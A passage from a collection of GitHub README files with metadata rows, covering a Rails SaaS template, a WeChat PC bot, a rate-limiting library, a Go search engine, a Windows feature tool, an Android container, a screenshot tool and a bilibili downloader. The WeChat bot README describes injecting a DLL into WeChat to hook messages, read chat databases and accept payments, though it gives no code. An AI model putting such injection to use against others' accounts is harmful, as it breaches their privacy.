| 25 | Weierstrass Theorem | [Video](https://www.youtube.com/watch?v=DT367udR6Uc&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=25) | |
| 26 | Final Class & Linear Programming | [Video](https://www.youtube.com/watch?v=H-2_Tl-4p_A&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=26) | [Homework 10](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2010.pdf) & [Exam 2](https://github.com/michiganrobotics/rob501/tree/main/Exams) |
A [more detailed course plan](https://github.com/michiganrobotics/rob501/tree/main/Course%20Schedule) is available.
## Credits
- Jessy Grizzle, Director, Michigan Robotics
- Nils Smit-Anseeuw
## License
All code is licensed under the [GNU General Public License v3.0](https://github.com/michiganrobotics/rob101/blob/main/LICENSE).
All other content, including textbooks, homeworks, and video, is licensed under the [Creative Commons Attribution-NonCommercial 4.0 (CC BY-NC 4.0)](https://creativecommons.org/licenses/by-nc/4.0/).
## For more
- [University of Michigan Robotics](https://robotics.umich.edu)
- [Michigan Robotics Twitter](http://twitter.com/umrobotics)
- [Michigan Robotics Instagram](http://instagram.com/umrobotics/)
| Mathematics for Robotics | null | 0 | 2 | 0 | 10 | 0 | 1 | 0 |
bullet-train-co/bullet_train | # Bullet Train Application Template
If you're new to Bullet Train, start with the [Bullet Train Developer Documentation](https://bullettrain.co/docs) and the [Getting Started](https://bullettrain.co/docs/getting-started) guide. You should also [join the community Discord server](https://discord.gg/bullettrain)!
## Building a New Application with Bullet Train
If you're building a new application with Bullet Train, you don't want to "Fork" the template repository on GitHub. Instead, you should:
1. Clone the template repository:
```
git clone git@github.com:bullet-train-co/bullet_train.git your_new_project_name
```
2. Enter the project directory:
```
cd your_new_project_name
```
3. Run the configuration and setup scripts:
```
bin/configure
bin/setup
```
4. Boot your application:
```
bin/dev
```
5. Visit `http://localhost:3000`.
## Cloud Development with Gitpod
[![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/bullet-train-co/bullet_train)
Clicking this button will set up a new Bullet Train project for development on [Gitpod](https://gitpod.io).
<br>
<br>
<p align="center">
<strong>Open-source development sponsored by:</strong>
</p>
<p align="center">
<a href="https://www.clickfunnels.com"><img src="https://images.clickfunnel.com/uploads/digital_asset/file/176632/clickfunnels-dark-logo.svg" width="575" /></a>
</p>
<br>
<br>
## Provisioning a Production Environment
You can use this public repository to provision a new application and then push your private application code there later.
### Render
[![Deploy to Render](https://render.com/images/deploy-to-render-button.svg)](https://render.com/deploy?repo=https://github.com/bullet-train-co/bullet_train)
Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure for your Bullet Train application which will cost about **$30/month**.
When you're done deploying to Render, you need to go into "Dashboard" > "web", copy the server URL, and then go into "Env Groups" > "settings" and paste the URL into the value for `BASE_URL`.
### Heroku
[![Deploy to Heroku](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=http://github.com/bullet-train-co/bullet_train)
Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure and services for your Bullet Train application which will cost about **$140/month**.
Once that process has completed, be sure to complete the other steps from the [Deploying to Heroku](https://bullettrain.co/docs/heroku) documentation.
## Contribute to Bullet Train
If you're looking to contribute to Bullet Train, you should "Fork" this template repository on GitHub, like so:
1. Visit https://github.com/bullet-train-co/bullet_train.
2. Click "Fork" in the top-right corner.
3. Select the account where you want to fork the repository.
4. Click the "Code" button on the new repository and copy the SSH path.
5. Clone your forked repository using the SSH path you copied, like so:
```
git clone git@github.com:your-account/bullet_train.git
cd bullet_train
```
6. Run the setup script:
```
bin/setup
```
7. Start the application:
```
bin/dev
```
> [!NOTE]
> Optional: If you have [ngrok](https://ngrok.com/) installed, uncomment `ngrok: ngrok http 3000` from `Procfile.dev` and run
> `bin/set-ngrok-url` to set `BASE_URL` to a publicly accessible domain.
> Run `bin/set-ngrok-url` after restarting `ngrok` to update `BASE_URL` to
> the current public url.
8. Visit http://localhost:3000.
---
This `README.md` file will be replaced with [`README.example.md`](./README.example.md) after running `bin/configure`.
| The Open Source Ruby on Rails SaaS Template | rails,saas,bullet-train | 91 | 66 | 1,268 | 1,823 | 76 | 89 | 12 |
ljc545w/ComWeChatRobot | # Description
A PC WeChat robot implementing the following features:
1. Get the contact list
2. Send text, image, file, XML article, contact card, and group @-mention messages
3. Query friend information by wxid
4. Get the wxid of every member of a group by group ID
5. Check friend status (still a friend, deleted, or blocked)
6. Receive all kinds of messages and handle them with callback functions
7. A COM interface wrapper, so you can call it from whatever language you prefer
8. Group management
9. Running multiple WeChat instances
# Use Cases
1. Posting Taoke (affiliate) deals
2. Traceless friend-list cleanup
3. Collecting WeChat official account articles
4. Chat history backup
5. Anything else you can think of
# Supported Versions
WeChat for Windows **3.5.0.46**
WeChat for Windows **3.6.0.18**
WeChat for Windows **3.7.0.26**
WeChat for Windows **3.7.0.30**
The main branch targets WeChat 3.7.0.30; for other versions, please check the corresponding branch.
# Build Environment
**Visual Studio 2019** (platform configuration: win32 (x86))
# How It Works
Key CALLs are located by reverse engineering PC WeChat and invoked from the DLL via inline assembly.
A 32-bit COM component is registered so that it can be called externally by 64-bit and 32-bit processes.
# Directory Layout
`./CWeChatRobot`: implementation of the COM component
`./DWeChatRobot`: implementation of the injected DLL; depending on the platform configuration it can be built as a socket version or a COM version
`./old_projects`: contains a C# invocation example and an Easy Language example for version 3.7.0.26
`./Python`: Python examples and interface test files
`./wxDriver`: implementation of the driver
To download binaries, go to: [Release](https://github.com/ljc545w/ComWeChatRobot/releases)
# Quick Start
Run the following commands with administrator privileges:
```shell
# Install
CWeChatRobot.exe /regserver
# Uninstall
CWeChatRobot.exe /unregserver
```
# Usage
**Python:**
See [wxRobot.py](/Python/com/wxRobot.py)
**C#:**
See [ComWechatRobotCsharp](https://github.com/RingoStudio/ComWechatRobotCsharp), thanks to @RingoStudio for the contribution
**Easy Language:**
See [ESDK](/old_projects/ESDK), thanks to @lovezm for the contribution
# More Features
1. Try to add the features requested in the issues
Development will follow the order above when time allows; that said, plans are just plans, so please bear with us if something does not get implemented.
**Pull requests are also welcome**
# Changelog
## 2022.04.01
1. Return the contact list as a SAFEARRAY so special characters in friends' nicknames display correctly
2. Added the directory layout section to the README
3. Updated the C# example code with an example of iterating over the friend list
## 2022.04.11
1. Changed the get-personal-info and send-article interfaces to be compatible with old-style wxid (untested; please open an issue if you hit problems)
2. Added a message-receiving interface; you can write a callback to process messages (see the Python example file)
## 2022.04.12
1. Added an interface for sending group @-mention messages
## 2022.04.12
1. Added an interface for getting the wxid of every group member by group ID
## 2022.04.13
1. Updated the group @-mention interface so that several people can be mentioned at once
## 2022.04.18
1. Added an interface for getting database handles (only some handles; getting all of them requires hooking)
2. Added an interface for executing SQL commands
3. Added an online database backup interface
## 2022.06.01
1. Adapted to WeChat **3.7.0.26**; some features are untested, please open an issue if something breaks
## 2022.06.02
1. Added an interface for accepting friend requests (combined with the message-receiving interface, friends can be accepted automatically)
2. Added getting the chat-history database handle (the friend-request message type is 0x25)
3. Improved the StartService interface; repeated injection no longer closes the remote process
## 2022.06.04
1. Finished the COM interface for adding friends via wxid and v3 data (interfaces for querying V3 data by WeChat ID, phone number, and QQ number will follow)
2. Improved the message-receiving logic and added the message time; added hooking of sent messages, with a BOOL value in the returned data distinguishing sent from received
3. Fixed a bug that could prevent the COM interface from loading DWeChatRobot.dll to compute offsets in the Release configuration
## 2022.06.07
1. Added interfaces for getting the current WeChat version (read from the registry) and for launching WeChat
2. Improved the database query interface; BLOB types can now be queried correctly
## 2022.06.10
1. Added interfaces for following official accounts, querying user info over the network, hooking voice messages and unencrypted images, and customizing the WeChat version number
2. The voice and image hook interfaces still have rough edges: received images may not be downloaded automatically, and voice message file names are currently timestamps (planned to be replaced with the message ID). Improvements will come when time allows.
## 2022.06.13
1. Improved the @-mention message interface with a new parameter indicating whether to automatically fill in the mentioned person's nickname
2. Improved the send-article interface with a new parameter for showing a thumbnail on the message card
3. Added a delete-friend interface
4. Added an interface for sending mini programs
## 2022.06.18
1. Fixed several bugs
2. Reorganized the code structure to make it easier to build websocket-based interfaces later
3. Added a driver that lets a 64-bit program inject the DLL into a 32-bit process
## 2022.06.24
1. Fixed incomplete socket data reception in the Python scripts
2. Fixed an issue where only one message was returned when several messages from the same person were synced during a heartbeat
3. Thanks to @shangdev for the idea: enabling the image hook now sets the automatic image download window to the whole day
## 2022.06.30
1. Adapted to version 3.7.0.30
## 2022.07.19
1. Added an interface for changing friend remarks
2. Added group management features, including adding members, removing members, setting announcements, renaming the group, setting your in-group nickname, and getting group members' nicknames
## 2022.07.24
1. Added multi-instance management
## 2022.07.28
1. Fixed some known issues and improved multi-instance management
2. Refactored part of the COM implementation
## 2022.08.13
1. Hooked message content now includes the message ID
2. Finished the HTTP interface for sending messages, see [wxDriver.py](/Python/http/wxDriver.py); the other interfaces need a bit more time
3. Added a project configuration file, thanks to @amchii for the approach
## 2022.08.21
1. All features are now wrapped as HTTP interfaces accepting GET and POST requests
2. Provided HTTP interface usage examples, see [wxDriver.py](/Python/http/wxDriver.py)
## 2022.08.25
1. Received messages are now in JSON format; extended information is also available, from which you can get the file save path or the wxid of mentioned users
2. Improved the get-personal-info and get-friend-info interfaces
## 2022.09.09
1. Added the ability to open WeChat's built-in browser
2. Added fetching official-account history messages (how much can be fetched is untested; use with caution to avoid account bans)
3. Fixed a bug that caused images and voice messages to be saved to the WeChat installation directory instead of the specified directory
4. Improved the real-time message interface; it now includes your own wxid
5. Improved the save paths for images and voice messages to make it easier to distinguish messages from different accounts
## 2022.09.10
1. Happy Mid-Autumn Festival
2. Added message forwarding; please do not forward voice messages, red packets, and the like
3. Added a `localId` field to the real-time message interface for use with the forwarding interface; recall notifications can now also be received
4. Improved the COM connection point: messages are broadcast in a thread, so clients can block while waiting for images, voice messages, and other resources to land on disk
## 2022.09.18
1. Fixed a bug where the correct message could not be forwarded when multiple MSG.db files exist; message forwarding now takes msgid as its parameter
2. Fixed a bug that prevented real-time messages from being received when no conversation was selected in WeChat
3. Fixed a bug that caused a memory access violation when fetching personal info for some WeChat accounts
4. Improved the real-time message interface: the localId field is no longer returned; extrabuf now returns the raw data instead of base64-encoded data; added a field distinguishing messages sent from the phone (received messages do not contain this field)
5. Improved the personal info interface; it can now return the personal folder path
6. Improved the group @-mention interface to prefer in-group nicknames when filling names
7. Added an interface for getting the login QR code; calling it switches WeChat to QR-code login
## 2022.09.22
1. Added a feature for getting the a8key
2. Fixed a bug that caused the get-database-handle interface to work only once
## 2022.09.27
1. Improved the message-forwarding and get-database-handle interfaces; real-time messages now include the raw timestamp
## 2022.10.07
1. Added an interface for sending raw XML
2. Added a logout interface
3. Attempted to fix file-sending failures and crashes caused by timestamp formatting
4. Added a field to real-time messages for the save location of video message thumbnails
## 2022.10.16
1. Added an interface for accepting payments
2. Improved the real-time message interface: voice/video call information can now be fetched, as can the hint shown when switching contacts on the phone
3. Fixed some known issues
## 2022.11.2
1. Support for sending animated stickers
2. Support for automatically downloading videos at night (real-time message listening must be enabled once)
3. Added downloading message attachments by message ID
# Support the Author
Please give the author a star. Many thanks!
# Disclaimer
This code is for learning and exchange only. Do not use it for illegal or commercial purposes! Any legal disputes arising from such use have nothing to do with the author!
| A PC WeChat robot: get the contact list; send text, image, file and other messages; wrapped in a COM interface for Python and C# | component,http,wechat,wechat-bot,windows | 13 | 6 | 44 | 169 | 50 | 5 | 0 |
upstash/ratelimit-js | # Upstash Rate Limit
[![npm (scoped)](https://img.shields.io/npm/v/@upstash/ratelimit)](https://www.npmjs.com/package/@upstash/ratelimit)
[![Tests](https://github.com/upstash/ratelimit/actions/workflows/tests.yaml/badge.svg)](https://github.com/upstash/ratelimit/actions/workflows/tests.yaml)
> [!NOTE]
> **This project is in GA Stage.**
> The Upstash Professional Support fully covers this project. It receives regular updates, and bug fixes. The Upstash team is committed to maintaining and improving its functionality.
It is the only connectionless (HTTP based) rate limiting library and designed
for:
- Serverless functions (AWS Lambda, Vercel ....)
- Cloudflare Workers & Pages
- Vercel Edge
- Fastly Compute@Edge
- Next.js, Jamstack ...
- Client side web/mobile applications
- WebAssembly
- and other environments where HTTP is preferred over TCP.
## Quick Start
### Install
#### npm
```bash
npm install @upstash/ratelimit
```
#### Deno
```ts
import { Ratelimit } from "https://cdn.skypack.dev/@upstash/ratelimit@latest";
```
### Create database
Create a new redis database on [upstash](https://console.upstash.com/). See [here](https://github.com/upstash/upstash-redis#quick-start) for documentation on how to create a redis instance.
### Basic Usage
```ts
import { Ratelimit } from "@upstash/ratelimit"; // for deno: see above
import { Redis } from "@upstash/redis"; // see below for cloudflare and fastly adapters
// Create a new ratelimiter, that allows 10 requests per 10 seconds
const ratelimit = new Ratelimit({
  redis: Redis.fromEnv(),
  limiter: Ratelimit.slidingWindow(10, "10 s"),
  analytics: true,
  /**
   * Optional prefix for the keys used in redis. This is useful if you want to share a redis
   * instance with other applications and want to avoid key collisions. The default prefix is
   * "@upstash/ratelimit"
   */
  prefix: "@upstash/ratelimit",
});
// Use a constant string to limit all requests with a single ratelimit
// Or use a userID, apiKey or ip address for individual limits.
const identifier = "api";
const { success } = await ratelimit.limit(identifier);
if (!success) {
  return "Unable to process at this time";
}
doExpensiveCalculation();
return "Here you go!";
```
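The same pattern extends naturally to per-user or per-IP limits. A minimal sketch, reusing the `ratelimit` instance from above and assuming the response also exposes `limit`, `remaining` and `reset` fields and that the runtime provides the web `Response` API; the handler shape and header names are illustrative, not part of the library:

```ts
// Sketch: rate limit per client IP and surface the metadata as response headers.
async function handleRequest(ip: string): Promise<Response> {
  const { success, limit, remaining, reset } = await ratelimit.limit(ip);

  if (!success) {
    return new Response("Too many requests", {
      status: 429,
      headers: {
        "X-RateLimit-Limit": limit.toString(),
        "X-RateLimit-Remaining": remaining.toString(),
        "X-RateLimit-Reset": reset.toString(),
      },
    });
  }

  return new Response("Here you go!");
}
```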
For more information on getting started, you can refer to [our documentation](https://upstash.com/docs/oss/sdks/ts/ratelimit/gettingstarted).
[Here's a complete nextjs example](https://github.com/upstash/ratelimit/tree/main/examples/nextjs)
## Documentation
See [the documentation](https://upstash.com/docs/oss/sdks/ts/ratelimit/overview) for more information details about this package.
## Contributing
### Database
Create a new redis database on [upstash](https://console.upstash.com/) and copy
the url and token.
### Running tests
To run the tests, you will need to set some environment variables. Here is a list of
variables to set:
- `UPSTASH_REDIS_REST_URL`
- `UPSTASH_REDIS_REST_TOKEN`
- `US1_UPSTASH_REDIS_REST_URL`
- `US1_UPSTASH_REDIS_REST_TOKEN`
- `APN_UPSTASH_REDIS_REST_URL`
- `APN_UPSTASH_REDIS_REST_TOKEN`
- `EU2_UPSTASH_REDIS_REST_URL`
- `EU2_UPSTASH_REDIS_REST_TOKEN`
You can create a single Upstash Redis and use its URL and token for all four above.
Once you set the environment variables, simply run:
```sh
pnpm test
```
| Rate limiting library for serverless runtimes | rate-limiting,redis,serverless,upstash,upstash-ratelimit,upstash-sdk | 52 | 33 | 72 | 260 | 1 | 17 | 3 |
sea-team/gofound | # GoFound
`GoFound` is a full-text search engine implemented in Golang, with persistence and millisecond-level queries over hundreds of millions of records on a single machine.
Its API can be called over HTTP.
See the [API documentation](./docs/api.md) for details.
## Documentation
+ [Examples](./docs/example.md)
+ [API documentation](./docs/api.md)
+ [Indexing internals](./docs/index.md)
+ [Configuration](./docs/config.md)
+ [Persistence](./docs/storage.md)
+ [Build & deployment](./docs/compile.md)
## Online Demo
> The Simple community runs GoFound; you can fuzzy-search related posts directly.
[Try it online](https://simpleui.72wo.com/search/simpleui)
## GoFound Online Admin Demo
[http://119.29.69.50:5678/admin](http://119.29.69.50:5678/admin)
![](./docs/images/img1.png)
![](./docs/images/img2.png)
## QQ Group
[556102631](https://qm.qq.com/cgi-bin/qm/qr?k=4OvO7bgRAhSLX0J2WXVbCWbY7hL7gMYd&jump_from=webapi)
## Binary Downloads
> Supports Windows, Linux, macOS (amd64 and arm64) and Apple M1 processors
[Download](https://github.com/newpanjing/gofound/releases)
## Tech Stack
+ Binary search
+ Quicksort
+ Inverted index
+ Forward index
+ File sharding
+ golang-jieba word segmentation
+ leveldb
### Why implement a full-text search engine in Golang?
+ As its name suggests, `GoFound` goes out to explore the world of full-text search: a small but capable engine with persistence and millisecond-level queries over hundreds of millions of records on a single machine.
+ Most traditional projects use `ElasticSearch` for full-text search, because `ElasticSearch` is mature, has an active community and plenty of documentation. Its downsides are complicated configuration and, being JVM-based, rather high memory consumption.
+ So we need a more efficient search engine that does not consume too much memory and achieves full-text search with minimal memory use. Compared with `ElasticSearch`, `gofound` is natively compiled, reduces system resource consumption and has no external dependencies.
## Install and Run
> After downloading the source code, enter the source directory and run the following two commands
>
+ Build
> If you download the prebuilt [executable](https://github.com/newpanjing/gofound/releases), you can skip this step entirely.
```shell
go get && go build
```
+ Run
```shell
./gofound --addr=:8080 --data=./data
```
+ Docker deployment
```shell
docker build -t gofound .
docker run -d --name gofound -p 5678:5678 -v /mnt/data/gofound:/usr/local/go_found/data gofound:latest
```
+ Other commands
See the [configuration documentation](./docs/config.md)
## Multi-language SDKs
> With the multi-language SDKs you can use gofound from different languages. Note that the SDK version must match gofound's major and minor version number; a differing patch version does not matter.
[Java](https://github.com/newpanjing/gofound-java)
[Python](https://github.com/newpanjing/gofound-python)
[Node.js](https://github.com/newpanjing/gofound-nodejs)
SDKs for other languages are gradually being completed. You can also call the HTTP API directly as described in the [API documentation](./docs/api.md).
## Comparison with ES
| ES | GoFound |
|-------------|-----------------------|
| Supports persistence | Supports persistence |
| In-memory index | Disk-based index + memory cache |
| Requires a JDK | Native binary with no external dependencies |
| Requires third-party word segmentation plugins | Built-in Chinese word segmentation and dictionary |
| No visual admin UI by default | Built-in visual admin UI |
| Large memory footprint | Native Golang executable with a very small memory footprint |
| Complex configuration | Starts with no arguments by default and exposes only a few options |
## To Do
[TODO](docs/TODO.md)
## Users of GoFound
[Simple社区](https://simpleui.72wo.com)| [贝塔博客](https://www.88cto.com) | [Book360](https://www.book360.cn)
[深圳市十二点科技有限公司](https://www.72wo.com)|[深圳市恒一博科技有限公司](http://www.hooebo.com)
[西安易神网络信息系统服务有限公司](http://www.hansonvip.com/)
[影视资源搜索](https://movie.ipip.icu)|[酷易物联](https://cooleiot.tech)|[French博客](https://hoime.cn/)
[好咪二次元之家](http://hoime.space)
## Release Notes
[Release notes](https://github.com/newpanjing/gofound/releases)
## Contributors
| Name | Contact | Contribution |
|---|---|---|
|[newpanjing](https://github.com/newpanjing)|newpanjing@icloud.com|Maintainer, engine, UI|
|[XiaoK29](https://github.com/XiaoK29)|-|Engine, API|
|[nightzjp](https://github.com/nightzjp)|-|Engine|
|[xiao luobei](https://github.com/liu-cn)|-|Engine|
| GoFound: a GoLang full-text search engine with millisecond-level queries, called over an HTTP API, with an integrated admin UI that any system can use. | null | 9 | 13 | 43 | 162 | 26 | 3 | 1 |
PeterStrick/ViVeTool-GUI | ![GitHub all releases](https://img.shields.io/github/downloads/peterstrick/vivetool-gui/total)
![GitHub License](https://img.shields.io/github/license/peterstrick/vivetool-gui)
![GitHub release (latest by date)](https://img.shields.io/github/v/release/peterstrick/vivetool-gui)
[![](https://dcbadge.vercel.app/api/server/8vDFXEucp2?style=flat)](https://discord.gg/8vDFXEucp2)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=PeterStrick_ViVeTool-GUI&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=PeterStrick_ViVeTool-GUI)
[![Translation](https://weblate.rawrr.dev/widgets/vivetool-gui/-/svg-badge.svg)](https://weblate.rawrr.dev/engage/vivetool-gui)
# ViVeTool GUI <img src="/images/icons8-advertisement-page-96.png" alt="ViVeTool GUI Logo" width="32"/>
### Windows Feature Control GUI based on ViVeTool
## What is ViVeTool GUI?
ViVeTool GUI lets you easily enable, disable and search for new hidden Features in Windows Insider Builds, with the use of a Button and a pretty UI.
## Disclaimer.
### No one, including me / [PeterStrick](https://github.com/PeterStrick), [the creators of ViVe and ViVeTool](https://github.com/thebookisclosed/ViVe) or [the creators of mach2](https://github.com/riverar/mach2), is responsible for any damage or unintended side effects this program might cause to your computer by changing the Windows Feature Store. Use this program at your own risk.
## How to use it?
Using it is simple.
Either:
1. Select the Build for which you want to enable or disable features for.
2. Wait for it to load in, open one of the Groups by pressing the Arrow, and select the Feature that you are looking for.
3. Press on Perform Action and perform your desired action for the selected feature.
<img width="511" height="355" src="/images/Method1.gif" alt="Image showing you how to perform Method 1" />
---
Or:
1. Press on "Manually change a Feature" (F12)
2. Enter a Feature ID
3. Press on Perform Action and perform your desired action for the entered Feature ID.
<img width="511" height="355" src="/images/Method2.gif" alt="Image showing you how to perform Method 2" />
---
## What are the additional features?
Apart from being able to manage features, ViVeTool GUI also lets you:
- Load in a Feature List of other Builds
- Search for Features
- Sort Features by Feature Name, Feature ID or Feature State
- Group Features by: Always Enabled, Always Disabled, Enabled by Default, Disabled by Default and Modifiable
- Copy Feature Names and IDs by right-clicking them
- Switch between Dark and Light Mode (the setting gets saved and applied on start)
- Automatically load the latest Feature List when starting ViVeTool GUI
- Scan a Windows Build for Hidden Features to create your own Feature List
- Use ViVeTool GUI in multiple translated Languages
- Fix the LastKnownGood Store, as well as the A/B Testing Priorities for ViVeTool Features
- and at last, view the About Box by either pressing on the About Icon, or selecting the "About..." Item in the Application System Menu.
<img width="511" height="175" src="/images/Searching.gif" alt="Image showing you how to search" />
## What are the System Requirements?
Since ViVeTool GUI uses the ViVe API, Windows 10 Build 18963 (Version 2004) and newer is the only OS Requirement.
Apart from that, the only requirement is .NET Framework 4.8
## Why not just use ViVeTool?
Using ViVeTool GUI is easier and more user-friendly; besides, it also lets you search for features and enable them with a few clicks.
# Licensing
ViVeTool GUI uses Icons from [icons8.com](https://icons8.com/)
ViVeTool GUI is inspired by [ViVeTool](https://github.com/thebookisclosed/ViVe) and uses the [ViVe API](https://github.com/thebookisclosed/ViVe/tree/master/ViVe)
ViVeTool GUI uses [files](https://github.com/riverar/mach2/tree/master/features) from [mach2](https://github.com/riverar/mach2) for the Build Combo Box.
ViVeTool GUI - Feature Scanner uses [mach2](https://github.com/riverar/mach2) to create its Feature Lists
| Windows Feature Control GUI based on ViVe / ViVeTool | windows10,windows-10,windows11,windows-11,windows,windows-features,vive,vivetool,mach2,feature-control | 15 | 5 | 37 | 137 | 3 | 2 | 2 |
twoyi/twoyi | <div align="center">
<p><b>Due to the complexity of the project and lack of any revenue, the project has been discontinued.</b></p>
</div>
<div align="center">
<p>
<h3>
<b>
Twoyi Platform
</b>
</h3>
</p>
<p>
<b>
A lightweight Android container
</b>
<br/>
</p>
<p>
[![contributions welcome](https://img.shields.io/badge/Contributions-welcome-brightgreen?logo=github)](CODE_OF_CONDUCT.md) [![Website](https://img.shields.io/badge/Website-available-brightgreen?logo=e)](https://twoyi.io)
</p>
<p>
<sub>
Made with ❤︎ by
<a href="https://github.com/tiann">
weishu
</a>
</sub>
</p>
<br />
<p>
<a href="https://twoyi.io">
<img
src="https://github.com/twoyi/twoyi/blob/main/assets/twoyi_screen.jpg?raw=true"
alt="Screenshot"
width="25%"
/>
</a>
</p>
</div>
[README 中文版](README_CN.md)
## Introduction
Twoyi is a lightweight Android container. It runs a nearly complete Android system as a normal app (no root required) on Android. Additionally, it supports Android 8.1 ~ 12.
## Capability
1. Use Taichi·Yang without unlocking the bootloader. Xposed, EdXposed and LSPosed will be supported.
2. Use root on non-rooted devices.
3. Use a few Magisk modules.
4. Implement additional system components such as virtual camera by virtualizing the HAL layer.
5. Do security research such as shelling.
## Features
1. Twoyi is a rootless Android system-level container, which runs a nearly complete Android system as a normal app and is mostly isolated from the main system.
2. The internal Android version is Android 8.1 and Android 10 will be supported.
3. Booting up twoyi is very fast (within three seconds) except for the initialization process.
4. Twoyi is an open source project.
5. The internal system of twoyi will be fully customizable. Because its system is open source, you can fork the project to compile your own system. You can also customize the system components, such as the HAL layer to implement virtual cameras, virtual sensors and other special features.
## Building
Twoyi contains two parts:
1. The twoyi app, which is actually a UI rendering engine.
2. The internal ROM of twoyi.
This repository contains the twoyi app, and the twoyi ROM is currently in the process of being open-sourced. Therefore, at this moment, the ROM cannot be compiled from source yet.
### Build the App manually
#### Install Rust
Twoyi is partially written in Rust, so it's necessary to [install Rust and Cargo](https://www.rust-lang.org/tools/install) first.
#### Install cargo-xdk
Please refer to [cargo-xdk](https://github.com/tiann/cargo-xdk).
You can check if it is installed by running `./gradlew cargoBuild`. If it succeeded, you will see libtwoyi.so in `app/src/main/jniLibs/arm64-v8a`.
P.S. Please use NDK v22 or lower, otherwise the build may fail.
#### Integrating rootfs
Currently you cannot build the ROM yourself; instead, you can use the prebuilt ROM.
To do that, extract rootfs.7z from the official release apk and copy it to `app/src/main/assets`.
### Build the app with Android Studio
Build it with Android Studio normally.
### Build the ROM
WIP
## Discussion
[Telegram Group](https://t.me/twoyi)
## Contact Me
twsxtd@gmail.com
| A lightweight Android container on Android | twoyi,virtual,android | 3 | 7 | 13 | 97 | 24 | 1 | 0 |
simonw/shot-scraper | # shot-scraper
[![PyPI](https://img.shields.io/pypi/v/shot-scraper.svg)](https://pypi.org/project/shot-scraper/)
[![Changelog](https://img.shields.io/github/v/release/simonw/shot-scraper?include_prereleases&label=changelog)](https://github.com/simonw/shot-scraper/releases)
[![Tests](https://github.com/simonw/shot-scraper/workflows/Test/badge.svg)](https://github.com/simonw/shot-scraper/actions?query=workflow%3ATest)
[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](https://github.com/simonw/shot-scraper/blob/master/LICENSE)
[![discord](https://img.shields.io/discord/823971286308356157?label=discord)](https://discord.gg/EE7Hx4Kbny)
A command-line utility for taking automated screenshots of websites
For background on this project see [shot-scraper: automated screenshots for documentation, built on Playwright](https://simonwillison.net/2022/Mar/10/shot-scraper/).
## Documentation
- [Full documentation for shot-scraper](https://shot-scraper.datasette.io/)
- [Tutorial: Automating screenshots for the Datasette documentation using shot-scraper](https://simonwillison.net/2022/Oct/14/automating-screenshots/)
- [Release notes](https://github.com/simonw/shot-scraper/releases)
## Get started with GitHub Actions
To get started without installing any software, use the [shot-scraper-template](https://github.com/simonw/shot-scraper-template) template to create your own GitHub repository which takes screenshots of a page using `shot-scraper`. See [Instantly create a GitHub repository to take screenshots of a web page](https://simonwillison.net/2022/Mar/14/shot-scraper-template/) for details.
## Quick installation
You can install the `shot-scraper` CLI tool using [pip](https://pip.pypa.io/):

    pip install shot-scraper
    # Now install the browser it needs:
    shot-scraper install

## Taking your first screenshot
You can take a screenshot of a web page like this:

    shot-scraper https://datasette.io/

This will create a screenshot in a file called `datasette-io.png`.
Many more options are available, see [Taking a screenshot](https://shot-scraper.datasette.io/en/stable/screenshots.html) for details.
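A few illustrative invocations follow; treat them as a sketch and confirm the exact flag names with `shot-scraper --help` or the documentation linked above:

    # Save the screenshot to a specific file
    shot-scraper https://datasette.io/ -o datasette.png

    # Set the browser viewport size
    shot-scraper https://datasette.io/ --width 800 --height 600

    # Screenshot a single element selected by CSS selector
    shot-scraper https://datasette.io/ --selector "#content"
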
## Examples
- The [shot-scraper-demo](https://github.com/simonw/shot-scraper-demo) repository uses this tool to capture recently spotted owls in El Granada, CA according to [this page](https://www.owlsnearme.com/?place=127871), and to generate an annotated screenshot illustrating a Datasette feature as described [in my blog](https://simonwillison.net/2022/Mar/10/shot-scraper/#a-complex-example).
- The [Datasette Documentation](https://docs.datasette.io/en/latest/) uses screenshots taken by `shot-scraper` running in the [simonw/datasette-screenshots](https://github.com/simonw/datasette-screenshots) GitHub repository, described in detail in [Automating screenshots for the Datasette documentation using shot-scraper](https://simonwillison.net/2022/Oct/14/automating-screenshots/).
- Ben Welsh built [@newshomepages](https://twitter.com/newshomepages), a Twitter bot that uses `shot-scraper` and GitHub Actions to take screenshots of news website homepages and publish them to Twitter. The code for that lives in [palewire/news-homepages](https://github.com/palewire/news-homepages).
- [scrape-hacker-news-by-domain](https://github.com/simonw/scrape-hacker-news-by-domain) uses `shot-scraper javascript` to scrape a web page. See [Scraping web pages from the command-line with shot-scraper](https://simonwillison.net/2022/Mar/14/scraping-web-pages-shot-scraper/) for details of how this works.
- Reuters uses shot-scraper to generate regularly updating data dashboards [for email newsletters](https://twitter.com/palewire/status/1658069533763026944).
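As a rough sketch of the `shot-scraper javascript` pattern (the URL and the expression here are just illustrative), the command evaluates a JavaScript expression on the page and prints the returned value:

```bash
# Evaluate a JavaScript expression against a page and print the result
shot-scraper javascript https://datasette.io/ "document.title"
```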
| A command-line utility for taking automated screenshots of websites | playwright,playwright-python,scraping,screenshot-utility,screenshots | 29 | 18 | 33 | 215 | 36 | 4 | 3 |
HFrost0/bilix | # bilix
[![GitHub license](https://img.shields.io/github/license/HFrost0/bilix?style=flat-square)](https://github.com/HFrost0/bilix/blob/master/LICENSE)
![PyPI](https://img.shields.io/pypi/v/bilix?style=flat-square&color=blue)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/HFrost0/bilix)
![PyPI - Downloads](https://img.shields.io/pypi/dm/bilix?label=pypi%20downloads&style=flat-square)
⚡️Lightning-fast asynchronous download tool for bilibili and more
## Features
### ⚡️ Fast & Async
Asynchronous high concurrency support, controllable concurrency and speed settings.
### 😉 Lightweight & User-friendly
Lightweight user-friendly CLI with progress notification, focusing on core functionality.
### 📝 Fully-featured
Submissions, anime, TV series, video clips, audio, favourites, danmaku, covers...
### 🔨 Extensible
Extensible Python module suitable for more download scenarios.
## Install
```shell
pip install bilix
```
For macOS, you can also install `bilix` with `brew`
```shell
brew install bilix
```
## Usage Example
* If you prefer to use the command-line interface (CLI)
```shell
bilix v 'url'
```
> `v` is a short alias for the `get_video` method
* If you prefer to code in Python
```python
